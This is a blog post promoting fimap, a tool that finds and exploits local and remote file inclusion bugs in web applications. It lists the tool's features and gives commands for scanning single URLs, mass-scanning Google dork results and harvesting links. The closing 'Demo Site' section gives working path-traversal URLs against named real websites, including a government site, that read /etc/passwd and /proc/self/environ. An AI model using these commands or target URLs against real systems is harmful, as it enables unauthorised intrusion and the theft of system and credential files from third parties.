Menu
 
» » » » » Best LFI | RFI Scanner in BackTrack Fimap-Exploitation Tool

A+ A-
Hi everyone this is a one more post on web scanner that is actually best on its Business For LFI (Local File Inclusion) And Remote File Inclusion .Though there are various tools available on backtrack but Fimap is one of the finest tool for detecting LFI and RFI on target website and exploiting it.

About Fimap Tool

It is a python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap is another tool which is best for getting LFI and RFI Out of a web app.it is still under development but works very fine.

Features and Functions

  • Automatically find the root of the file system
  • Detect default files outside of the web folder
  • Attempts to detect passwords inside the files
  • Supports basic authentication
  • Can use null byte to bypass some controls
  • Writes a report of the scan to a file
  • Add your own payloads and patches to the config.py file.
  • Has a Harvest mode which can collect URLs from a given domain for later pentesting.
  • All commands will now be send base64 encoded. So you can use quotes as much as you want.
  • php://input detection is now 100% reliable.
  • You can now define a POST string for relative and absolute files in the config.py.
  • TTL implemented. You can define it with “—ttl “. Default is 30 seconds.
  • Experimental HTTP Proxy support. You can define a HTTP(s) proxy with “—http-proxy localhost:8080″.
  • Googlescanner can now skip the first X pages. Use “—skip-pages X”.
  • Lots of bugfixes and additional regular expressions.
  • Harvest mode which can collect URLs from a given domain for later pentesting.
  • Can handle directories in RFI mode like:
    <*? include (*$*_GET["inc"] . "/content/index.html"); *?**>
    <***? include (*$*_GET["inc"] . "_lang/index.html"); *?**>
    (Remove * symbol)
    where Null-Byte is not possible.
  • You always define absolute path names in the configs. No monkey like redundant pathes like:
    ../etc/passwd
    ../../etc/passwd
    ../../../etc/passwd
  • Has a Blind Mode (--enable-blind) for cases when the server has disabled error messages. BlindMode
  • Test and exploit multiple bugs:
    include()
    include_once()
    require()
    require_once()

    Working With Fimap

    Scan a single URL for FI errors

    #./fimap -u http://www.example.com/test.php?file=bang&id=23
    scanning for lfi/rfi

    Scan Google search results for FI errors

    #./fimap.py -g -q inurl:index.php

    web scanner

    Harvest all links of a webpage

    #./fimap.py –H -u http://example.com–d 3 –w /tmp/urllist

    best web scanner

  • -m is for mass scanning
  • -l is for list
  • Scan websites using google dorks
  • .fimap.py -g -q ‘inurl:index.php’
  • -g for searching from google
  • -q stands for the query which is to be searched in google.


    Requirements

    Needs: Python >= 2.4

    Download
    Click Here

    Demo Site:
    Vuln Check1 :=http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../etc/passwd
    Vuln Check2 :=http://www.bislig.gov.ph/content1.php?page=5&directLinks=../../../../../../../../../../../../../../proc/self/environ

    Exmp 2 := http://www.aladde.org/index.php?load=../../../../../../../../../../../../../../proc/self/environ

    Hope you like this tutorial don't forget to leave your valuable comment thank You :)
    • Posted by
    Labels: , , ,

    Share to:

    at 12:50 AM

    Post a Comment

    Feel Free To Ask Your Query we Love To Answer

    Subscribe to: Post Comments (Atom)
     
    Top